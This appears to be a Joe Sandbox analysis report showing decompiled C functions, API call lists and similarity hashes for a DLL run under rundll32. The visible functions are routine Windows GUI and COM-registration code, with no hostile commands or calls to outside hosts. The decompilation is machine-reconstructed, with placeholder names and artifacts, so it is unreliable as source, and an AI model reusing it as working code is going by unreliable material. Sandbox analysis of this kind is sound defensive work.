                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                        • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                        • API String ID: 667068680-68207542
                                                                                                        • Opcode ID: 218cd20856afeff638e58877dca3a6b50e1afb1d124be69f089d893ca2cb3741
                                                                                                        • Instruction ID: a488cc10199e6142ec29f8114730dfd2e71765366de182c3c23aa3b245fff598
                                                                                                        • Opcode Fuzzy Hash: 218cd20856afeff638e58877dca3a6b50e1afb1d124be69f089d893ca2cb3741
                                                                                                        • Instruction Fuzzy Hash: 55214A70A06A24DAF749DF258DC4C69BBE5FB6A280361443FD10CD2394DB344A469FA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 88%
                                                                                                        			E100018E0(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                        				intOrPtr _v12;
                                                                                                        				char _v16;
                                                                                                        				intOrPtr _v20;
                                                                                                        				int _v24;
                                                                                                        				char _v28;
                                                                                                        				struct tagRECT _v56;
                                                                                                        				char _v72;
                                                                                                        				intOrPtr _v76;
                                                                                                        				intOrPtr _v80;
                                                                                                        				char _v92;
                                                                                                        				struct HDC__* _v96;
                                                                                                        				int _v100;
                                                                                                        				int _v104;
                                                                                                        				int _v116;
                                                                                                        				int _v120;
                                                                                                        				void* _v124;
                                                                                                        				char _v128;
                                                                                                        				struct tagRECT _v152;
                                                                                                        				struct HICON__* _v156;
                                                                                                        				int _v160;
                                                                                                        				intOrPtr _v164;
                                                                                                        				char _v168;
                                                                                                        				intOrPtr _v184;
                                                                                                        				int _v188;
                                                                                                        				int _v192;
                                                                                                        				int _v204;
                                                                                                        				int _v208;
                                                                                                        				char _v212;
                                                                                                        				char _v220;
                                                                                                        				char _v228;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t80;
                                                                                                        				struct HICON__* _t90;
                                                                                                        				int _t92;
                                                                                                        				intOrPtr _t100;
                                                                                                        				int _t109;
                                                                                                        				intOrPtr _t111;
                                                                                                        				void* _t128;
                                                                                                        				int _t130;
                                                                                                        				int _t144;
                                                                                                        				int _t161;
                                                                                                        				void* _t170;
                                                                                                        				int _t172;
                                                                                                        				void* _t174;
                                                                                                        				void* _t175;
                                                                                                        				void* _t178;
                                                                                                        				signed int _t179;
                                                                                                        
                                                                                                        				_t182 = __eflags;
                                                                                                        				_push(0xffffffff);
                                                                                                        				_push(0x10056da8);
                                                                                                        				_push( *[fs:0x0]);
                                                                                                        				_push(_t128);
                                                                                                        				_push(_t174);
                                                                                                        				_t80 =  *0x10072650; // 0xb5e27fef
                                                                                                        				_push(_t80 ^ (_t179 & 0xfffffff8) - 0x00000058);
                                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                                        				_t170 = __ecx;
                                                                                                        				_push( *((intOrPtr*)(_a4 + 0x18)));
                                                                                                        				_t175 = E10008F77(_t128,  *((intOrPtr*)(_a4 + 0x18)), __ecx, _t174, __eflags);
                                                                                                        				GetClientRect( *(_t170 + 0x20),  &_v56);
                                                                                                        				_t172 = _v56.right - _v56.left;
                                                                                                        				_t130 = _v56.bottom - _v56.top;
                                                                                                        				E1000AB19(_t130, _t172, _t175, _t182);
                                                                                                        				_t90 = LoadIconA( *(E1000AB19(_t130, _t172, _t175, _t182) + 0xc), 1);
                                                                                                        				_v96 = _t90;
                                                                                                        				if(_t90 != 0) {
                                                                                                        					_v104 = GetSystemMetrics(0xb);
                                                                                                        					_t92 = GetSystemMetrics(0xc);
                                                                                                        					_v100 = _t92;
                                                                                                        					_v76 = 0;
                                                                                                        					_v80 = 0x10059080;
                                                                                                        					_v12 = 0;
                                                                                                        					if(E10009236( &_v92, _t172, _t178, CreateCompatibleBitmap( *(_t175 + 4), _v104, _t92)) == 0) {
                                                                                                        						L4:
                                                                                                        						_v24 = 0xffffffff;
                                                                                                        						_v92 = 0x10058e64;
                                                                                                        					} else {
                                                                                                        						E1000899B( &(_v56.top));
                                                                                                        						_v24 = 1;
                                                                                                        						if(E10008F85( &_v56, _t172, _t178, CreateCompatibleDC( *(_t175 + 4))) != 0) {
                                                                                                        							_t100 = E10009304(_v56.top, _v92);
                                                                                                        							__eflags = _t100;
                                                                                                        							if(_t100 == 0) {
                                                                                                        								goto L3;
                                                                                                        							} else {
                                                                                                        								_t144 = _t130 - 8;
                                                                                                        								_t161 = _t172 - 8;
                                                                                                        								_v100 = _t161;
                                                                                                        								_v104 = _t144;
                                                                                                        								StretchBlt(_v56.top, 0, 0, _v120, _v116,  *(_t175 + 4), 2, 2, _t161, _t144, 0xcc0020);
                                                                                                        								DrawIcon(_v96, 0, 0, _v156);
                                                                                                        								_v120 = 0;
                                                                                                        								_v124 = 0x10059090;
                                                                                                        								_v72 = 2;
                                                                                                        								_v124 = GetStockObject(7);
                                                                                                        								_v164 = E10009357(_t175,  &_v128);
                                                                                                        								_t109 = _t130 - 4;
                                                                                                        								_v160 = _t109;
                                                                                                        								Rectangle( *(_t175 + 4), 0, 0, _t172 - 4, _t109);
                                                                                                        								_t111 = _v184;
                                                                                                        								__eflags = _t111;
                                                                                                        								if(_t111 != 0) {
                                                                                                        									E10009357(_t175, _t111);
                                                                                                        								}
                                                                                                        								_v152.left = 0;
                                                                                                        								_v156 = 0x10059070;
                                                                                                        								_v156 = GetStockObject(3);
                                                                                                        								SetRect( &(_v152.right), _t172 - 4, 4, _t172, _t130);
                                                                                                        								E10001360(_t175,  &(_v152.right),  &_v160);
                                                                                                        								SetRect( &_v152, 4, _v188, _t172, _t130);
                                                                                                        								E10001360(_t175,  &_v152,  &_v168);
                                                                                                        								StretchBlt( *(_t175 + 4), 2, 2, _v188, _v192, _v152.bottom, 0, 0, _v208, _v204, 0xcc0020);
                                                                                                        								_v220 = 0x10058e64;
                                                                                                        								E10009289( &_v220);
                                                                                                        								_v160 = 1;
                                                                                                        								_v212 = 0x10058e64;
                                                                                                        								E10009289( &_v212);
                                                                                                        								_v160 = 0;
                                                                                                        								E10008FE9( &_v188);
                                                                                                        								_v160 = 0xffffffff;
                                                                                                        								_v228 = 0x10058e64;
                                                                                                        							}
                                                                                                        						} else {
                                                                                                        							L3:
                                                                                                        							_v28 = 0;
                                                                                                        							E10008FE9( &_v56);
                                                                                                        							goto L4;
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_t90 = E10009289( &_v92);
                                                                                                        				}
                                                                                                        				 *[fs:0x0] = _v20;
                                                                                                        				return _t90;
                                                                                                        			}
                                                                                                        0x100019d4
                                                                                                        0x00000000
                                                                                                        0x100019d4
                                                                                                        0x100019c9
                                                                                                        0x10001b7d
                                                                                                        0x10001b7d
                                                                                                        0x10001b86
                                                                                                        0x10001b94

                                                                                                        APIs
                                                                                                        • GetClientRect.USER32 ref: 10001925
                                                                                                        • LoadIconA.USER32 ref: 1000194B
                                                                                                        • GetSystemMetrics.USER32 ref: 1000195F
                                                                                                        • GetSystemMetrics.USER32 ref: 1000196B
                                                                                                        • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 10001991
                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 100019B7
                                                                                                        • StretchBlt.GDI32(?,00000000,00000000,10059080,?,?,00000002,00000002,?,?,00CC0020), ref: 10001A31
                                                                                                        • DrawIcon.USER32 ref: 10001A45
                                                                                                        • GetStockObject.GDI32(00000007), ref: 10001A62
                                                                                                        • Rectangle.GDI32(?,00000000,00000000,?,?), ref: 10001A90
                                                                                                        • GetStockObject.GDI32(00000003), ref: 10001AB8
                                                                                                        • SetRect.USER32 ref: 10001ACF
                                                                                                        • SetRect.USER32 ref: 10001AF4
                                                                                                          • Part of subcall function 10008FE9: DeleteDC.GDI32(00000000), ref: 10008FFB
                                                                                                        • StretchBlt.GDI32(?,00000002,00000002,?,10059080,?,00000000,00000000,?,?,00CC0020), ref: 10001B35
                                                                                                          • Part of subcall function 10009289: DeleteObject.GDI32(00000000), ref: 10009298
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ObjectRect$CompatibleCreateDeleteIconMetricsStockStretchSystem$BitmapClientDrawLoadRectangle
                                                                                                        • String ID: n^t
                                                                                                        • API String ID: 3819712357-440804003
                                                                                                        • Opcode ID: d4a0fadfc0e7d5ff0c1524fd6e23814d727a6e98294ed68b7b34fef277336eb8
                                                                                                        • Instruction ID: 95c7e32fdb2d67d625ce792a260a26d7687ac2e919df4a9c96c8cb9d492619a0
                                                                                                        • Opcode Fuzzy Hash: d4a0fadfc0e7d5ff0c1524fd6e23814d727a6e98294ed68b7b34fef277336eb8
                                                                                                        • Instruction Fuzzy Hash: 8D811CB5608740AFE314DFA4C885F5BB7F8EB88B40F004A1DF69697290DB74E905CB66
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 89%
                                                                                                        			E1000DFB9(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                                                        				signed int _v8;
                                                                                                        				intOrPtr _v12;
                                                                                                        				struct tagRECT _v28;
                                                                                                        				struct tagRECT _v44;
                                                                                                        				struct tagRECT _v60;
                                                                                                        				struct tagRECT _v80;
                                                                                                        				char _v100;
                                                                                                        				void* __edi;
                                                                                                        				intOrPtr _t58;
                                                                                                        				struct HWND__* _t59;
                                                                                                        				intOrPtr _t94;
                                                                                                        				signed int _t103;
                                                                                                        				struct HWND__* _t104;
                                                                                                        				void* _t105;
                                                                                                        				struct HWND__* _t107;
                                                                                                        				long _t108;
                                                                                                        				long _t116;
                                                                                                        				void* _t119;
                                                                                                        				struct HWND__* _t121;
                                                                                                        				void* _t123;
                                                                                                        				intOrPtr _t125;
                                                                                                        				intOrPtr _t129;
                                                                                                        
                                                                                                        				_t119 = __edx;
                                                                                                        				_t105 = __ebx;
                                                                                                        				_t125 = __ecx;
                                                                                                        				_v12 = __ecx;
                                                                                                        				_v8 = E10011632(__ecx);
                                                                                                        				_t58 = _a4;
                                                                                                        				if(_t58 == 0) {
                                                                                                        					if((_v8 & 0x40000000) == 0) {
                                                                                                        						_t59 = GetWindow( *(__ecx + 0x20), 4);
                                                                                                        					} else {
                                                                                                        						_t59 = GetParent( *(__ecx + 0x20));
                                                                                                        					}
                                                                                                        					_t121 = _t59;
                                                                                                        					if(_t121 != 0) {
                                                                                                        						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
                                                                                                        						if(_t104 != 0) {
                                                                                                        							_t121 = _t104;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					_t121 =  *(_t58 + 0x20);
                                                                                                        				}
                                                                                                        				_push(_t105);
                                                                                                        				GetWindowRect( *(_t125 + 0x20),  &_v60);
                                                                                                        				if((_v8 & 0x40000000) != 0) {
                                                                                                        					_t107 = GetParent( *(_t125 + 0x20));
                                                                                                        					GetClientRect(_t107,  &_v28);
                                                                                                        					GetClientRect(_t121,  &_v44);
                                                                                                        					MapWindowPoints(_t121, _t107,  &_v44, 2);
                                                                                                        				} else {
                                                                                                        					if(_t121 != 0) {
                                                                                                        						_t103 = GetWindowLongA(_t121, 0xfffffff0);
                                                                                                        						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
                                                                                                        							_t121 = 0;
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_v100 = 0x28;
                                                                                                        					if(_t121 != 0) {
                                                                                                        						GetWindowRect(_t121,  &_v44);
                                                                                                        						E1000BDA7(_t121, E1000BD3C(_t121, 2),  &_v100);
                                                                                                        						CopyRect( &_v28,  &_v80);
                                                                                                        					} else {
                                                                                                        						_t94 = E10009B1B();
                                                                                                        						if(_t94 != 0) {
                                                                                                        							_t94 =  *((intOrPtr*)(_t94 + 0x20));
                                                                                                        						}
                                                                                                        						E1000BDA7(_t121, E1000BD3C(_t94, 1),  &_v100);
                                                                                                        						CopyRect( &_v44,  &_v80);
                                                                                                        						CopyRect( &_v28,  &_v80);
                                                                                                        					}
                                                                                                        				}
                                                                                                        				_t108 = _v60.left;
                                                                                                        				asm("cdq");
                                                                                                        				_t123 = _v60.right - _t108;
                                                                                                        				asm("cdq");
                                                                                                        				_t120 = _v44.bottom;
                                                                                                        				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
                                                                                                        				_a4 = _v60.bottom - _v60.top;
                                                                                                        				asm("cdq");
                                                                                                        				asm("cdq");
                                                                                                        				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
                                                                                                        				if(_t116 >= _v28.left) {
                                                                                                        					if(_t123 + _t116 > _v28.right) {
                                                                                                        						_t116 = _t108 - _v60.right + _v28.right;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					_t116 = _v28.left;
                                                                                                        				}
                                                                                                        				if(_t129 >= _v28.top) {
                                                                                                        					if(_a4 + _t129 > _v28.bottom) {
                                                                                                        						_t129 = _v60.top - _v60.bottom + _v28.bottom;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					_t129 = _v28.top;
                                                                                                        				}
                                                                                                        				return E100117F5(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
                                                                                                        			}


























                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                        • String ID: (
                                                                                                        • API String ID: 808654186-3887548279
                                                                                                        • Opcode ID: 85787c2ac3c5c56a995a776c19bd5d0477b129fd03190058c37fe231b9601763
                                                                                                        • Instruction ID: fb707396ee3149fb6cd8cd8dd1b3a8bf0fa40f6b6c89d8f3e7599025cca0cdbc
                                                                                                        • Opcode Fuzzy Hash: 85787c2ac3c5c56a995a776c19bd5d0477b129fd03190058c37fe231b9601763
                                                                                                        • Instruction Fuzzy Hash: 65518172A00219ABEB00CBA8CD85EEEBBB9EF48390F154115F905F7295DB70ED418B60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 92%
                                                                                                        			E1002D785(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
                                                                                                        				signed int _v8;
                                                                                                        				void _v24;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t20;
                                                                                                        				intOrPtr _t24;
                                                                                                        				intOrPtr _t25;
                                                                                                        				int _t27;
                                                                                                        				signed int _t29;
                                                                                                        				struct HICON__* _t34;
                                                                                                        				struct HICON__* _t36;
                                                                                                        				struct HPEN__* _t40;
                                                                                                        				short _t43;
                                                                                                        				struct HINSTANCE__* _t53;
                                                                                                        				intOrPtr _t58;
                                                                                                        				intOrPtr _t59;
                                                                                                        				signed int _t60;
                                                                                                        				void* _t61;
                                                                                                        				void* _t62;
                                                                                                        				void* _t63;
                                                                                                        				int _t64;
                                                                                                        				signed int _t66;
                                                                                                        				void* _t68;
                                                                                                        				void* _t69;
                                                                                                        				void* _t73;
                                                                                                        				void* _t74;
                                                                                                        
                                                                                                        				_t61 = __edx;
                                                                                                        				_t54 = __ecx;
                                                                                                        				_t52 = __ebx;
                                                                                                        				_t20 =  *0x10072650; // 0xb5e27fef
                                                                                                        				_v8 = _t20 ^ _t66;
                                                                                                        				_t62 = __ecx;
                                                                                                        				E1002966C(__ebx, _t63, _t66, 5);
                                                                                                        				_t64 = 0;
                                                                                                        				_t68 =  *0x100991e0 - _t64; // 0x0
                                                                                                        				if(_t68 != 0) {
                                                                                                        					L12:
                                                                                                        					_t77 =  *0x100991dc;
                                                                                                        					if( *0x100991dc == 0) {
                                                                                                        						_t29 = E1003C158(_t77, 0x1002d747);
                                                                                                        						asm("sbb al, al");
                                                                                                        						 *0x100991dc =  ~_t29 + 1;
                                                                                                        					}
                                                                                                        					E100296D9(5);
                                                                                                        					 *(_t62 + 4) = _t64;
                                                                                                        					_t24 =  *0x100991d8; // 0x0
                                                                                                        					 *((intOrPtr*)(_t62 + 0x20)) = _t24;
                                                                                                        					_t25 = _t24 + _t24;
                                                                                                        					 *((intOrPtr*)(_t62 + 0x18)) = _t25;
                                                                                                        					 *((intOrPtr*)(_t62 + 0x1c)) = _t25;
                                                                                                        					_t27 = SetRectEmpty(_t62 + 0x28);
                                                                                                        					 *(_t62 + 0x3c) = _t64;
                                                                                                        					 *(_t62 + 0x38) = _t64;
                                                                                                        					 *(_t62 + 0x40) = _t64;
                                                                                                        					 *(_t62 + 0x44) = _t64;
                                                                                                        					return E10039F21(_t27, _t52, _v8 ^ _t66, _t61, _t62, _t64);
                                                                                                        				}
                                                                                                        				_t69 =  *0x100991d0 - _t64; // 0x0
                                                                                                        				_push(__ebx);
                                                                                                        				if(_t69 != 0) {
                                                                                                        					L8:
                                                                                                        					_t74 =  *0x100991d4 - _t64; // 0x0
                                                                                                        					if(_t74 == 0) {
                                                                                                        						_t40 = CreatePen(2, _t64, _t64);
                                                                                                        						_t75 = _t40 - _t64;
                                                                                                        						 *0x100991d4 = _t40;
                                                                                                        						if(_t40 == _t64) {
                                                                                                        							E100296D9(5);
                                                                                                        							E100088D4(_t54);
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_t53 =  *(E1000AB19(_t52, _t62, _t64, _t75) + 0xc);
                                                                                                        					 *0x100991a8 = LoadCursorA(_t53, 0x7907);
                                                                                                        					_t34 = LoadCursorA(_t53, 0x7908);
                                                                                                        					_t58 =  *0x100991a8; // 0x0
                                                                                                        					 *0x100991ac = _t34;
                                                                                                        					 *0x100991b0 = _t58;
                                                                                                        					 *0x100991b4 = _t34;
                                                                                                        					 *0x100991b8 = LoadCursorA(_t53, 0x7909);
                                                                                                        					_t36 = LoadCursorA(_t53, 0x790a);
                                                                                                        					_t59 =  *0x100991b8; // 0x0
                                                                                                        					 *0x100991bc = _t36;
                                                                                                        					 *0x100991c0 = _t59;
                                                                                                        					 *0x100991c4 = _t36;
                                                                                                        					 *0x100991c8 = LoadCursorA(_t53, 0x790b);
                                                                                                        					 *0x100991cc = LoadCursorA(_t53, 0x790c);
                                                                                                        					 *0x100991d8 = GetProfileIntA("windows", "oleinplaceborderwidth", 4);
                                                                                                        					 *0x100991e0 = 1;
                                                                                                        					_t64 = 0;
                                                                                                        					_pop(_t52);
                                                                                                        					goto L12;
                                                                                                        				} else {
                                                                                                        					_t43 = 0x1111;
                                                                                                        					_t60 = 0;
                                                                                                        					do {
                                                                                                        						 *((short*)(_t66 + _t60 * 2 - 0x14)) = _t43;
                                                                                                        						 *((short*)(_t66 + _t60 * 2 - 0xc)) = _t43;
                                                                                                        						_t43 = _t43 + _t43;
                                                                                                        						_t60 = _t60 + 1;
                                                                                                        					} while (_t60 < 4);
                                                                                                        					_t52 = CreateBitmap(8, 8, 1, 1,  &_v24);
                                                                                                        					if(_t52 == 0) {
                                                                                                        						E100296D9(5);
                                                                                                        						E100088D4(_t60);
                                                                                                        					}
                                                                                                        					 *0x100991d0 = CreatePatternBrush(_t52);
                                                                                                        					DeleteObject(_t52);
                                                                                                        					_t73 =  *0x100991d0 - _t64; // 0x0
                                                                                                        					if(_t73 == 0) {
                                                                                                        						E100296D9(5);
                                                                                                        						E100088D4(_t60);
                                                                                                        					}
                                                                                                        					goto L8;
                                                                                                        				}
                                                                                                        			}

                                                                                                        APIs
                                                                                                          • Part of subcall function 1002966C: EnterCriticalSection.KERNEL32(100990B0,?,?,?,?,10029CDD,00000010,00000008,1000AB47,1000AAEA,10008389,1000AB51,10008F14,00000000,10008F7E,00000001), ref: 100296A8
                                                                                                          • Part of subcall function 1002966C: InitializeCriticalSection.KERNEL32(?,?,?,?,?,10029CDD,00000010,00000008,1000AB47,1000AAEA,10008389,1000AB51,10008F14,00000000,10008F7E,00000001), ref: 100296B7
                                                                                                          • Part of subcall function 1002966C: LeaveCriticalSection.KERNEL32(100990B0,?,?,?,?,10029CDD,00000010,00000008,1000AB47,1000AAEA,10008389,1000AB51,10008F14,00000000,10008F7E,00000001), ref: 100296C4
                                                                                                          • Part of subcall function 1002966C: EnterCriticalSection.KERNEL32(?,?,?,?,?,10029CDD,00000010,00000008,1000AB47,1000AAEA,10008389,1000AB51,10008F14,00000000,10008F7E,00000001), ref: 100296D0
                                                                                                        • CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 1002D7DC
                                                                                                        • CreatePatternBrush.GDI32(00000000), ref: 1002D7F5
                                                                                                        • DeleteObject.GDI32(00000000), ref: 1002D801
                                                                                                        • CreatePen.GDI32(00000002,00000000,00000000), ref: 1002D827
                                                                                                        • LoadCursorA.USER32 ref: 1002D856
                                                                                                        • LoadCursorA.USER32 ref: 1002D863
                                                                                                        • LoadCursorA.USER32 ref: 1002D881
                                                                                                        • LoadCursorA.USER32 ref: 1002D88E
                                                                                                        • LoadCursorA.USER32 ref: 1002D8AC
                                                                                                        • LoadCursorA.USER32 ref: 1002D8B9
                                                                                                        • GetProfileIntA.KERNEL32(windows,oleinplaceborderwidth,00000004), ref: 1002D8CC
                                                                                                        • SetRectEmpty.USER32(?), ref: 1002D921
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CursorLoad$CriticalSection$Create$Enter$BitmapBrushDeleteEmptyInitializeLeaveObjectPatternProfileRect
                                                                                                        • String ID: oleinplaceborderwidth$windows
                                                                                                        • API String ID: 1172225617-1250992421
                                                                                                        • Opcode ID: 6dabdecb1bebb98b79643705a930e39a32ef61c8c008d2a798b2bfcfe42a855a
                                                                                                        • Instruction ID: 108a072f32104c8e1b3c0a1676cd042793ca7758ef75f559bcc5029a0f450241
                                                                                                        • Opcode Fuzzy Hash: 6dabdecb1bebb98b79643705a930e39a32ef61c8c008d2a798b2bfcfe42a855a
                                                                                                        • Instruction Fuzzy Hash: C7414D70A44327AFF754EFB99C89A4A7BA8FB08750F40452BF609D72A1DB746440CF91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 95%
                                                                                                        			E1003521E(void* __ecx, void* _a4, void* _a8, void* _a12) {
                                                                                                        				signed int _v8;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				void* _t20;
                                                                                                        				CHAR* _t23;
                                                                                                        				signed int _t25;
                                                                                                        				void* _t26;
                                                                                                        				signed int _t31;
                                                                                                        				int _t33;
                                                                                                        				CHAR* _t36;
                                                                                                        				char* _t42;
                                                                                                        				CHAR* _t48;
                                                                                                        
                                                                                                        				_t20 = _a12;
                                                                                                        				_v8 = _t20;
                                                                                                        				_t3 =  &_v8;
                                                                                                        				 *_t3 = _v8 & 0x00000001;
                                                                                                        				_t42 = "Insertable";
                                                                                                        				if( *_t3 == 0) {
                                                                                                        					L9:
                                                                                                        					_t36 = 0;
                                                                                                        					__eflags = _t20 & 0x00000002;
                                                                                                        					if((_t20 & 0x00000002) != 0) {
                                                                                                        						_t36 = "Apartment";
                                                                                                        					}
                                                                                                        					__eflags = _t20 & 0x00000004;
                                                                                                        					if((_t20 & 0x00000004) != 0) {
                                                                                                        						_t36 = "Free";
                                                                                                        					}
                                                                                                        					__eflags = (_t20 & 0x00000006) - 6;
                                                                                                        					if((_t20 & 0x00000006) == 6) {
                                                                                                        						_t36 = "Both";
                                                                                                        					}
                                                                                                        					__eflags = _t36;
                                                                                                        					if(_t36 == 0) {
                                                                                                        						L21:
                                                                                                        						_t23 = 1;
                                                                                                        						goto L7;
                                                                                                        					} else {
                                                                                                        						_t25 = RegOpenKeyExA(_a8, "InprocServer32", 0, 0x20006,  &_a12);
                                                                                                        						asm("sbb esi, esi");
                                                                                                        						_t48 =  ~_t25 + 1;
                                                                                                        						__eflags = _t48;
                                                                                                        						if(__eflags == 0) {
                                                                                                        							_t26 = E1000AB19(_t36, _t42, _t48, __eflags);
                                                                                                        							__eflags =  *((char*)(_t26 + 0x14));
                                                                                                        							if( *((char*)(_t26 + 0x14)) == 0) {
                                                                                                        								_t48 = 1;
                                                                                                        								__eflags = 1;
                                                                                                        							}
                                                                                                        						} else {
                                                                                                        							_t31 = RegSetValueExA(_a12, "ThreadingModel", 0, 1, _t36, lstrlenA(_t36) + 1);
                                                                                                        							asm("sbb esi, esi");
                                                                                                        							_t48 =  ~_t31 + 1;
                                                                                                        							RegCloseKey(_a12);
                                                                                                        						}
                                                                                                        						__eflags = _t48;
                                                                                                        						if(_t48 == 0) {
                                                                                                        							L4:
                                                                                                        							if(_v8 != 0) {
                                                                                                        								RegDeleteValueA(_a8, _t42);
                                                                                                        								RegDeleteValueA(_a4, _t42);
                                                                                                        							}
                                                                                                        							_t23 = _t48;
                                                                                                        							L7:
                                                                                                        							return _t23;
                                                                                                        						} else {
                                                                                                        							goto L21;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				_t33 = RegSetValueA(_a4, _t42, 1, 0x100630e0, 0);
                                                                                                        				if(_t33 != 0 || RegSetValueA(_a8, _t42, 1, 0x100630e0, _t33) != 0) {
                                                                                                        					_t48 = 0;
                                                                                                        					goto L4;
                                                                                                        				} else {
                                                                                                        					_t20 = _a12;
                                                                                                        					goto L9;
                                                                                                        				}
                                                                                                        			}


















                                                                                                        APIs
                                                                                                        • RegSetValueA.ADVAPI32(?,Insertable,00000001,100630E0,00000000), ref: 1003524A
                                                                                                        • RegSetValueA.ADVAPI32(?,Insertable,00000001,100630E0,00000000), ref: 10035258
                                                                                                        • RegDeleteValueA.ADVAPI32(?,Insertable), ref: 10035270
                                                                                                        • RegDeleteValueA.ADVAPI32(?,Insertable), ref: 10035276
                                                                                                        • RegOpenKeyExA.ADVAPI32(?,InprocServer32,00000000,00020006,?), ref: 100352BB
                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 100352CB
                                                                                                        • RegSetValueExA.ADVAPI32(?,ThreadingModel,00000000,00000001,00000000,00000001), ref: 100352E0
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 100352F0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
